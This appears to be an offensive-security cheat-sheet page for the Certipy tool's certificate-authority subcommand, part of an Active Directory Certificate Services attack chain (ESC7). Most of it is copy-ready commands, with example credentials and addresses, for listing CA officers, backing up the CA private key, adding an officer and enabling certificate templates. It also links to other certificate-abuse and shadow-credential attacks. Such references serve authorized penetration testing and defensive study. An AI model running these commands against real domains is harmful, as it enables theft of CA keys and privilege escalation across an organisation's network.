Certipy CA Management
Enumerate and manipulate the certificate authority itself: list officers (ESC7), backup the CA private key, add/remove officers and managers, list templates available on the CA. Required for ESC7 escalation chains.
- Tool
- certipy
- Category
- Credential Attacks / ADCS (Certificate Abuse)
- Platform
- linux
- Requires
- password
- Protocols
- LDAP, RPC
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -list-officers
Credential variants
The same attack using a different authentication material.
Backup CA Key requires password
certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -backup
Add Officer (ESC7) requires password
certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -add-officer <new_officer>
List Templates requires password
certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -list-templates
Enable Template requires password
certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -enable-template '<template>'
Examples
certipy ca -u 'jdoe@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -ca 'CORP-CA' -list-officers
certipy ca -u 'jdoe@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -ca 'CORP-CA' -enable-template 'SmartcardLogon'
Tags
References
Related commands
- bloodyAD Shadow Credentials Add a Key Credential (msDS-KeyCredentialLink) to a target object you have GenericWrite…
- Certipy Account Operations Create, update, read, or delete user / computer accounts directly through Certipy.…
- Certipy Authenticate with Certificate Authenticate using a PFX certificate to obtain a TGT and NT hash
- Certipy ESC1 (Subject in Request) Exploit ESC1: a template that allows the requester to specify a Subject Alternative Name…
- Certipy ESC11 (RPC Relay to ICPR) ESC11: ICertPassage RPC interface accepts NTLM without IF_ENFORCEENCRYPTICERTREQUEST.…
- Certipy ESC13 (OID Group Link) ESC13: a template's issuance policy is linked to a privileged group via…
- Certipy ESC14 (altSecurityIdentities Mapping) ESC14: weak explicit certificate mapping via altSecurityIdentities. With write access…
- Certipy ESC15 (Schema V1 EKUwu) ESC15 / EKUwu: schema v1 templates honor Application Policies from the CSR, letting an…